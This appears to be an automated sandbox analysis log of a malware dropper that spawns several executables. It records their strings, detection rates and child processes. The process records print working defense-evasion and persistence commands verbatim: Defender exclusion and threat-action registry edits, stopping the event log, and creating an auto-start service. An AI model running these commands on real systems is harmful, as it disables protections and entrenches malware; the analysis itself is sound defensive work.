Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	ReversingLabs: Detection: 68%
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Virustotal: Detection: 50%

Source: NjdbLPleIutA8FKI_S3fRztd.exe	String found in binary or memory: set-addPolicy
Source: NjdbLPleIutA8FKI_S3fRztd.exe	String found in binary or memory: id-cmc-addExtensions
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: $_/C_/am/proxy_dictator/agent/install
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.log
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.UserLocation
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.Exec
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.SystemLocation
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.copyFile
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.run
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.SetRegKey
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.init
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: #_/C_/am/proxy_dictator/agent/install.RegKey
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: _/C_/am/proxy_dictator/agent/install.RegKey
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: C:/am/proxy_dictator/agent/install/log.go
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: C:/am/proxy_dictator/agent/install/install.go
Source: yqnvj2zXKAsCMyFmEDrQLSxi.exe	String found in binary or memory: C:/am/proxy_dictator/agent/install/registry.go

Source: unknown	Process created: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe "C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process created: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe .\Install.exe
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Process created: C:\Program Files (x86)\NetVoyager\nv.exe "C:\Program Files (x86)\NetVoyager\nv.exe"
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe .\Install.exe /qiFwdidsyGaM "525403" /S
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "VIFLJRPW"
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "VIFLJRPW" binpath= "C:\ProgramData\xprfjygruytr\etzpikspwykg.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "VIFLJRPW"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe C:\ProgramData\xprfjygruytr\etzpikspwykg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\powercfg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Jump to behavior
Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe	Process created: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\9SPLMMrYRskiaGUcrT9MofKl.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe .\Install.exe	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Process created: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NjdbLPleIutA8FKI_S3fRztd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\NoCZBiPwAcSyoDte_ne2sJt7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "VIFLJRPW"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "VIFLJRPW" binpath= "C:\ProgramData\xprfjygruytr\etzpikspwykg.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\mbnxbv_uftcj649iS9ilHBrA.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "VIFLJRPW"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\Dc25WcfSyV8lvRa9ThM7DR04.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\piratemamm\HBnXrwXMNXUElNaizB6OqLMm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Process created: C:\Program Files (x86)\NetVoyager\nv.exe "C:\Program Files (x86)\NetVoyager\nv.exe"
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe .\Install.exe /qiFwdidsyGaM "525403" /S
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
